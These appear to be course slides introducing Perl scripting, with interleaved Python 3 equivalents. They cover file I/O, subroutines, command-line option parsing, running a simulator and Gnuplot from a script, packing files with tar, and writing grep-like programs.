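The search for large files can also be sketched in Python 3 with `os.walk`, which visits every directory in a tree much as find does. The function name `find_large_files`, the byte threshold and the scratch files are assumptions made for this illustration; with find, `-size +2000` corresponds to more than 2000 blocks of 512 bytes, i.e. 1024000 bytes.

```python
import os
import tempfile

def find_large_files(root, min_bytes):
    """Return (size, path) pairs for plain files larger than min_bytes,
    largest first."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # plain files only, like -type f (symbolic links are skipped)
            if os.path.isfile(path) and not os.path.islink(path):
                size = os.path.getsize(path)
                if size > min_bytes:
                    hits.append((size, path))
    return sorted(hits, reverse=True)

# small demonstration in a scratch directory (hypothetical file names)
root = tempfile.mkdtemp()
os.mkdir(os.path.join(root, 'sub'))
with open(os.path.join(root, 'small.txt'), 'w') as f:
    f.write('x' * 10)
with open(os.path.join(root, 'sub', 'big.txt'), 'w') as f:
    f.write('x' * 5000)

large = find_large_files(root, 1000)
for size, path in large:
    print(size, path)
```

Returning a list instead of acting on each file immediately makes it easy to inspect the hits before removing or moving anything.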

![]() | The tar command can pack single files or all files in a directory tree into one file, which can be unpacked later
tar -cvf myfiles.tar mytree file1 file2
# options:
# c: pack, v: list name of files, f: pack into file
# unpack the mytree tree and the files file1 and file2:
tar -xvf myfiles.tar
# options:
# x: extract (unpack) |
![]() | The tarfile can be compressed:
gzip myfiles.tar
# result: myfiles.tar.gz |

![]() | Pack all PostScript figures:
tar -cvf ps.tar `find $HOME -name '*.ps' -print`
gzip ps.tar |
![]() | Pack a directory but remove CVS directories and redundant files
# take a copy of the original directory:
cp -r myhacks /tmp/oblig1-hpl
# remove CVS directories
find /tmp/oblig1-hpl -name CVS -print -exec rm -rf {} \;
# remove redundant files:
find /tmp/oblig1-hpl \( -name '*~' -o -name '*.bak' \
-o -name '*.log' \) -print -exec rm -f {} \;
# pack files:
tar -cf oblig1-hpl.tar /tmp/oblig1-hpl
gzip oblig1-hpl.tar
# send oblig1-hpl.tar.gz as mail attachment
|
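
The copy, clean and pack sequence can be condensed in Python 3 with the standard `tarfile` module, whose `add` method accepts a filter that may drop entries. The sketch below is one possible arrangement under stated assumptions: the names `skip_redundant` and `pack`, and the scratch tree with its dummy files, are invented for the demonstration. Because unwanted entries are filtered out while packing, no temporary copy of the directory is needed.

```python
import os
import tarfile
import tempfile

SKIP_DIRS = {'CVS'}
SKIP_SUFFIXES = ('~', '.bak', '.log')

def skip_redundant(tarinfo):
    """Filter for TarFile.add: return None to leave an entry out."""
    name = os.path.basename(tarinfo.name)
    if tarinfo.isdir() and name in SKIP_DIRS:
        return None    # the directory and everything below it is skipped
    if tarinfo.isfile() and name.endswith(SKIP_SUFFIXES):
        return None
    return tarinfo

def pack(tree, tarname):
    """Pack the directory tree into a gzip-compressed tar file."""
    with tarfile.open(tarname, 'w:gz') as tar:
        tar.add(tree, arcname=os.path.basename(tree), filter=skip_redundant)

# demonstration on a scratch tree (hypothetical file names)
work = tempfile.mkdtemp()
tree = os.path.join(work, 'oblig1-hpl')
os.makedirs(os.path.join(tree, 'CVS'))
for name in ('script.py', 'script.py~', 'run.log',
             os.path.join('CVS', 'Entries')):
    with open(os.path.join(tree, name), 'w') as f:
        f.write('dummy\n')

tarname = os.path.join(work, 'oblig1-hpl.tar.gz')
pack(tree, tarname)
with tarfile.open(tarname) as tar:
    packed = sorted(tar.getnames())
print(packed)
```

Opening the archive with mode `'w:gz'` combines the tar and gzip steps into one.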


![]() | Perl in a recent version (5.8) |
![]() | the following packages: Bundle::libnet, Tk, LWP::Simple, CGI::Debug, CGI::QuickForm |

![]() | We start with writing "Hello, World!" and computing the sine of a number given on the command line |
![]() | The script (hw.pl) should be run like this:
perl hw.pl 3.4
or just (Unix)
./hw.pl 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

#!/usr/bin/perl
# fetch the first (0) command-line argument:
$r = $ARGV[0];
# compute sin(r) and store in variable $s:
$s = sin($r);
# print to standard output:
print "Hello, World! sin($r)=$s\n";

![]() | The first line specifies the interpreter of the script (here /usr/bin/perl)
perl hw.pl 1.4 # first line: just a comment
./hw.pl 1.4 # first line: interpreter spec. |
![]() | Scalar variables in Perl start with a dollar sign |
![]() | Each statement must end with a semicolon |
![]() | The command-line arguments are stored in an array ARGV
$r = $ARGV[0]; # get the first command-line argument |

![]() | Strings are automatically converted to numbers if necessary
$s = sin($r)
(recall Python's need to convert r to float) |
![]() | Perl supports variable interpolation (variables are inserted directly into the string):
print "Hello, World! sin($r)=$s\n";
or we can control the format using printf:
printf "Hello, World! sin(%g)=%12.5e\n", $r, $s;
(printf in Perl works like printf in C) |

![]() | Only double-quoted strings work with variable interpolation:
print "Hello, World! sin($r)=$s\n"; |
![]() | Single-quoted strings do not recognize Perl variables (nor escape sequences such as \n):
print 'Hello, World! sin($r)=$s\n';
yields the output
Hello, World! sin($r)=$s\n |
![]() | Single- and double-quoted strings can span several lines (a la triple-quoted strings in Python) |

![]() | Use perldoc to read Perl man pages:
perldoc perl # overview of all Perl man pages
perldoc perlsub # read about subroutines
perldoc Cwd # look up a special module, here 'Cwd'
perldoc -f printf # look up a special function, here 'printf'
perldoc -q cgi # search the FAQ for the text 'cgi' |
![]() | Become familiar with the man pages |
![]() | Does Perl have a function for ...? Check perlfunc |
![]() | Very useful Web site: www.perldoc.com |
![]() | Alternative: The 'Camel book' (much of the man pages are taken from that book) |
![]() | Many textbooks have more accessible info about Perl |

![]() | Read (x,y) data from a two-column file |
![]() | Transform y values to f(y) |
![]() | Write (x,f(y)) to a new file |
![]() | File opening, reading, writing, closing |
![]() | How to write and call a function |
![]() | How to work with arrays |

![]() | Read two command-line arguments: input and output filenames
($infilename, $outfilename) = @ARGV;
the variables in the list on the left are set, one by one, to the elements of the @ARGV array |
![]() | Could also write
$infilename = $ARGV[0]; $outfilename = $ARGV[1];
but this is less perl-ish |

![]() | What if the user fails to provide two command-line arguments?
die "Usage: $0 infilename outfilename" if $#ARGV < 1;
# $#ARGV is the largest valid index in @ARGV,
# the length of @ARGV is then $#ARGV+1 (first index is 0) |
![]() | die terminates the program (with exit status different from 0) |

![]() | Open files:
open(INFILE, "<$infilename"); # open for reading
open(OUTFILE, ">$outfilename"); # open for writing
open(APPFILE, ">>$outfilename"); # open for appending |
![]() | Read line by line:
while (defined($line=<INFILE>)) {
  # process $line
}
|

sub myfunc {
  my ($y) = @_;
  # all arguments to the function are stored
  # in the array @_
  # the my keyword defines local variables
  # more general example on extracting arguments:
  # my ($arg1, $arg2, $arg3) = @_;
  if ($y >= 0.0) {
    return $y**5.0*exp(-$y);
  }
  else {
    return 0.0;
  }
}
Functions can be put anywhere in a file

![]() | Input file format: two columns of numbers
0.1 1.4397
0.2 4.325
0.5 9.0 |
![]() | Read (x,y), transform y, write (x,f(y)):
while (defined($line=<INFILE>)) {
  ($x,$y) = split(' ', $line); # extract x and y value
  $fy = myfunc($y); # transform y value
  printf(OUTFILE "%g %12.5e\n", $x, $fy);
}
|
![]() | Close files:
close(INFILE); close(OUTFILE); |

![]() | The script runs without error messages if the file does not exist (recall that Python by default issues error messages in case of non-existing files) |
![]() | In Perl we should test explicitly for successful operations and issue error messages
open(INFILE, "<$infilename")
or die "unsuccessful opening of $infilename; $!\n";
# $! is a variable containing the error message from
# the operating system ('No such file or directory' here)
|

: # *-*-perl-*-*
eval 'exec perl -w -S $0 ${1+"$@"}'
if 0; # if running under some shell
die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
($infilename, $outfilename) = @ARGV;
open(INFILE, "<$infilename") or die "$!\n";
open(OUTFILE, ">$outfilename") or die "$!\n";
sub myfunc {
  my ($y) = @_;
  if ($y >= 0.0) { return $y**5.0*exp(-$y); }
  else { return 0.0; }
}

![]() | Perl has a flexible syntax:
if ($#ARGV < 1) {
  die "Usage: $0 infilename outfilename\n";
}
die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
Parentheses can be left out from function calls:
open INFILE, "<$infilename"; # open for reading |
![]() | Functions (subroutines) extract arguments from the list @_ |
![]() | Subroutine variables are global by default; the my prefix makes them local |

# read one line at a time:
while (defined($line=<INFILE>)) {
  ($x, $y) = split(' ', $line); # extract x and y value
  $fy = myfunc($y); # transform y value
  printf(OUTFILE "%g %12.5e\n", $x, $fy);
}
close(INFILE); close(OUTFILE);

![]() | Read input file into list of lines:
@lines = <INFILE>; |
![]() | Store x and y data in arrays:
# go through each line and split line into x and y columns
@x = (); @y = (); # store data pairs in two arrays x and y
for $line (@lines) {
  ($xval, $yval) = split(' ', $line);
  push(@x, $xval); push(@y, $yval);
}
|

![]() | For-loop in Perl:
for ($i = 0; $i <= $last_index; $i++) { ... }
|
![]() | Loop over (x,y) values:
open(OUTFILE, ">$outfilename")
  or die "unsuccessful opening of $outfilename; $!\n";
for ($i = 0; $i <= $#x; $i++) {
  $fy = myfunc($y[$i]); # transform y value
  printf(OUTFILE "%g %12.5e\n", $x[$i], $fy);
}
close(OUTFILE);
|

![]() | Perl distinguishes between array and list |
![]() | Short story: array is the variable, and it can have a list or its length as values, depending on the context
@myarr = (1, 99, 3, 6); # @myarr is the array, (1, 99, 3, 6) is the list |
![]() | List context: the value of @myarr is a list
@q = @myarr; # array q gets the same entries as @myarr |
![]() | Scalar context: the value of @myarr is its length
$q = @myarr; # q becomes the no of elements in @myarr |

![]() | Can use the array as loop limit:
for ($i = 0; $i < @x; $i++) {
  # work with $x[$i] ...
}
|
![]() | Can test on @ARGV for the number of command-line arguments:
die "Usage: $0 infilename outfilename" unless @ARGV >= 2;
# instead of
die "Usage: $0 infilename outfilename" if $#ARGV < 1; |

![]() | Method 1: write just the name of the scriptfile:
./datatrans1.pl infile outfile
or
datatrans1.pl infile outfile
if . (current working directory) or the directory containing datatrans1.pl is in the path |
![]() | Method 2: run an interpreter explicitly:
perl datatrans1.pl infile outfile
Use the first perl program found in the path |
![]() | On Windows machines one must use method 2 |

![]() | In method 1, the first line specifies the interpreter |
![]() | Explicit path to the interpreter:
#!/usr/local/bin/perl
#!/usr/home/hpl/scripting/Linux/bin/perl |
![]() | Using env to find the first Perl interpreter in the path
#!/usr/bin/env perl
is not a good idea because it does not always work with
#!/usr/bin/env perl -w
i.e. Perl with warnings (ok on SunOS, not on Linux) |

![]() | Using Bourne shell to find the first Perl interpreter
in the path:
: # *-*-perl-*-*
eval 'exec perl -w -S $0 ${1+"$@"}'
if 0; # if running under some shell
Run src/perl/headerfun.sh for in-depth explanation
|
![]() | The latter header makes it easy to move scripts from one machine to another |
![]() | Nevertheless, sometimes you need to ensure that all users apply a specific Perl interpreter |



Code: oscillator (written in Fortran 77)

![]() | Input: m, b, c, and so on read from standard input |
![]() | How to run the code:
oscillator < file
where file can be
3.0
0.04
1.0
... |
![]() | Results (t, y(t)) in a file sim.dat |



![]() | Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';
# screen plot: (x,y) data are in the file sim.dat
plot 'sim.dat' title 'y(t)' with lines;
# hardcopies:
set size ratio 0.3 1.5, 1.0;
set term postscript eps mono dashed 'Times-Roman' 28;
set output 'case.ps';
plot 'sim.dat' title 'y(t)' with lines;
# make a plot in PNG format as well:
set term png small;
set output 'case.png';
plot 'sim.dat' title 'y(t)' with lines; |
![]() | Commands can be given interactively or put in file |

![]() | Change oscillating system parameters by editing the simulator input file |
![]() | Run simulator:
oscillator < inputfile |
![]() | Plot:
gnuplot -persist -geometry 800x200 case.gp
(case.gp contains Gnuplot commands) |
![]() | Plot annotations must be consistent with inputfile |
![]() | Let's automate! |

![]() | Usage:
./simviz1.pl -m 3.2 -b 0.9 -dt 0.01 -case run1
Sensible default values for all options |
![]() | Put simulation and plot files in a subdirectory (specified by -case run1) |

![]() | Set default values of m, b, c etc. |
![]() | Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc. |
![]() | Create and move to subdirectory |
![]() | Write input file for the simulator |
![]() | Run simulator |
![]() | Write Gnuplot commands in a file |
![]() | Run Gnuplot |

![]() | Set default values of the script's input parameters:
$m = 1.0; $b = 0.7; $c = 5.0; $func = "y"; $A = 5.0;
$w = 2*3.14159; $y0 = 0.2; $tstop = 30.0; $dt = 0.05;
$case = "tmp1"; $screenplot = 1; |
![]() | Examine command-line options:
# read variables from the command line, one by one:
while (@ARGV) {
  $option = shift @ARGV; # load cmd-line arg into $option
  if ($option eq "-m") {
    $m = shift @ARGV; # load next command-line arg
  }
  elsif ($option eq "-b") { $b = shift @ARGV; }
  ...
}
shift 'eats' (extracts and removes) the first array element
|

use Getopt::Long; # load module with GetOptions function
GetOptions("m=f" => \$m, "b=f" => \$b, "c=f" => \$c,
           "func=s" => \$func, "A=f" => \$A, "w=f" => \$w,
           "y0=f" => \$y0, "tstop=f" => \$tstop,
           "dt=f" => \$dt, "case=s" => \$case,
           "screenplot!" => \$screenplot);
# explanations:
"m=f" => \$m
# command-line option --m or -m requires a float (f)
# variable, e.g., -m 5.1 sets $m to 5.1
"func=s" => \$func
# --func string (result in $func)
"screenplot!" => \$screenplot
# --screenplot turns $screenplot on,
# --noscreenplot turns $screenplot off
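
For readers coming from the Python part of the course, roughly the same option table can be sketched with Python 3's standard `argparse` module. This is an illustration under assumptions, not a translation of the Perl module: the function name `parse_options` is made up, the defaults are copied from the Perl script, and the negatable `screenplot!` option is imitated by two separate flags that write to the same destination.

```python
import argparse

def parse_options(argv):
    """Parse simviz1-style options; defaults follow the Perl script."""
    parser = argparse.ArgumentParser()
    floats = {'m': 1.0, 'b': 0.7, 'c': 5.0, 'A': 5.0, 'w': 2*3.14159,
              'y0': 0.2, 'tstop': 30.0, 'dt': 0.05}
    for name, default in floats.items():
        # type=float plays the role of "=f" in Getopt::Long
        parser.add_argument('-' + name, type=float, default=default)
    # plain strings, like "=s"
    parser.add_argument('-func', default='y')
    parser.add_argument('-case', default='tmp1')
    # two flags sharing one destination imitate "screenplot!"
    parser.add_argument('--screenplot', dest='screenplot',
                        action='store_true', default=True)
    parser.add_argument('--noscreenplot', dest='screenplot',
                        action='store_false')
    return parser.parse_args(argv)

args = '-m 3.2 -b 0.9 -dt 0.01 -case run1 --noscreenplot'.split()
opts = parse_options(args)
print(opts.m, opts.b, opts.dt, opts.case, opts.screenplot)
```

In both languages the declared type does the checking: a non-numeric value for `-m` is rejected by the parser instead of silently ending up in the simulator input.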

![]() | Perl has a rich cross-platform operating system interface |
![]() | Safe, cross-platform creation of a subdirectory:
$dir = $case;
use File::Path; # contains the rmtree function
if (-d $dir) { # does $dir exist?
  rmtree($dir); # remove directory
  print "deleting directory $dir\n";
}
mkdir($dir, 0755)
  or die "Could not create $dir; $!\n";
chdir($dir)
  or die "Could not move to $dir; $!\n";
|

open(F,">$case.i") or die "open error; $!\n";
print F "
$m
$b
$c
$func
$A
$w
$y0
$tstop
$dt
";
close(F);
Double-quoted strings can be used for multi-line output

![]() | Stand-alone programs can be run as
system "$cmd"; # $cmd is the command to be run
# examples:
system "myprog < input_file";
system "ls *.ps"; # valid, but bad - Unix-specific |
![]() | Safe execution of our simulator:
$cmd = "oscillator < $case.i";
$failure = system($cmd);
die "running the oscillator code failed\n" if $failure; |
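
The same pattern (run a program with redirected input, then check the exit status) can be sketched in Python 3 with `subprocess.run`. The helper name `run_with_input` is an assumption of this sketch, and because the oscillator program cannot be assumed to be installed, a tiny Python child process stands in for it.

```python
import subprocess
import sys
import tempfile

def run_with_input(argv, input_filename):
    """Run the program argv with standard input redirected from a file.
    Raise RuntimeError if the exit status is nonzero."""
    with open(input_filename) as infile:
        completed = subprocess.run(argv, stdin=infile,
                                   capture_output=True, text=True)
    if completed.returncode != 0:
        raise RuntimeError('running %s failed' % argv[0])
    return completed.stdout

# stand-in for "oscillator < case.i": a child process that echoes its
# standard input in upper case (hypothetical input data)
with tempfile.NamedTemporaryFile('w', suffix='.i', delete=False) as f:
    f.write('m=1.0\nb=0.7\n')
child = [sys.executable, '-c',
         'import sys; sys.stdout.write(sys.stdin.read().upper())']
output = run_with_input(child, f.name)
print(output)
```

Passing the command as a list and the input as an open file avoids going through a shell, so the call does not depend on Unix-specific redirection syntax.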

![]() | Make Gnuplot script:
open(F, ">$case.gnuplot");
# print multiple lines using a "here document"
print F <<EOF;
set title '$case: m=$m b=$b c=$c f(y)=$func ...';
...
EOF
close(F); |
![]() | Run Gnuplot:
$cmd = "gnuplot -geometry 800x200 -persist $case.gnuplot";
$failure = system($cmd);
die "running gnuplot failed\n" if $failure; |

![]() | Double-quoted strings:
print "\
Here is some multi-line text
with a variable $myvar inserted.
Newlines are preserved.
" |
![]() | 'Here document':
print FILE <<EOF;
Here is some multi-line text
with a variable $myvar inserted.
Newlines are preserved.
EOF
Note: final EOF must start in 1st column! |

![]() | All Perl functions can be used without parentheses in calls:
open(F, "<$somefile"); # with parentheses
open F, "<$somefile"; # without parentheses
More examples:
printf F "%5d: %g\n", $i, $result;
system "./myapp -f 0"; |
![]() | If-like tests can follow the action:
printf F "%5d: %g\n", $i, $result unless $counter > 0;
# equivalent C-like syntax:
if (!($counter > 0)) {
  printf(F "%5d: %g\n", $i, $result);
}
|
![]() | This Perl syntax makes scripts easier to read |

![]() | TIMTOWTDI = There Is More Than One Way To Do It |
![]() | TIMTOWTDI is a Perl philosophy |
![]() | These notes: emphasis on one verbose (easy-to-read) way to do it |
![]() | Nevertheless, you need to know several Perl programming styles to understand other people's codes! |
![]() | Example of TIMTOWTDI: a Perl grep program |

![]() | Suppose you want to find all lines in a C file containing the string superLibFunc |
![]() | Unix grep is handy for this purpose:
grep superLibFunc myfile.c
prints the lines containing superLibFunc |
![]() | Can also search for text patterns (regular expressions) |

![]() | Experienced Perl programmer:
$string = shift;
while (<>) { print if /$string/o; }
|
![]() | Lazy Perl user:
perl -n -e 'print if /superLibFunc/;' file1 file2 file3 |
![]() | Eh, Perl has a grep command...
$string = shift; print grep /$string/, <>; |
![]() | Confused? Next slide is for the novice |

#!/usr/bin/perl
die "Usage: $0 string file1 file2 ...\n" if $#ARGV < 1;
# first command-line argument is the string to search for:
$string = shift @ARGV; # = $ARGV[0];
# run through the next command-line arguments,
# i.e. run through all files, load the file and grep:
while (@ARGV) {
  $file = shift @ARGV;
  if (-f $file) {
    open(FILE,"<$file");
    @lines = <FILE>; # read all lines into a list
    foreach $line (@lines) {
      # check if $line contains the string $string:
      if ($line =~ /$string/) { # regex match?
        print "$file: $line";
      }
    }
  }
}
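
For comparison with the verbose Perl version, the same grep logic might look as follows in Python 3. The function name `grep` and the scratch C file are chosen for this sketch only.

```python
import os
import re
import tempfile

def grep(pattern, filenames):
    """Return 'filename: line' strings for all lines matching pattern."""
    regex = re.compile(pattern)
    hits = []
    for filename in filenames:
        if not os.path.isfile(filename):
            continue                 # corresponds to the -f test in Perl
        with open(filename) as f:
            for line in f:
                if regex.search(line):      # regex match?
                    hits.append('%s: %s' % (filename, line))
    return hits

# demonstration on a scratch file (hypothetical content)
with tempfile.NamedTemporaryFile('w', suffix='.c', delete=False) as f:
    f.write('int main() {\n  superLibFunc(1);\n  return 0;\n}\n')
matches = grep('superLibFunc', [f.name])
for match in matches:
    print(match, end='')
```

Iterating over the file object reads one line at a time, so unlike `@lines = <FILE>` the whole file is never held in memory.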

![]() | Lazy Perl programmers make use of the implicit underscore variable:
foreach (@files) {
  if (-f) {
    open(FILE,"<$_");
    foreach (<FILE>) {
      if (/$string/) {
        print;
}}}}
|
![]() | The fully equivalent code is
foreach $_(@files) {
  if (-f $_) {
    open(FILE,"<$_");
    foreach $_(<FILE>) {
      if ($_ =~ /$string/) {
        print $_;
}}}}
|

![]() | With use of dollar underscore:
die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
($string, @files) = @ARGV;
foreach (@files) {
  next unless -f; # jump to next loop pass
  open FILE, $_;
  foreach (<FILE>) { print if /$string/; }
}
|
![]() | Without dollar underscore:
die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
($string, @files) = @ARGV;
foreach $file (@files) {
  next unless -f $file;
  open FILE, $file;
  foreach $line (<FILE>) {
    print $line if $line =~ /$string/;
}}
|
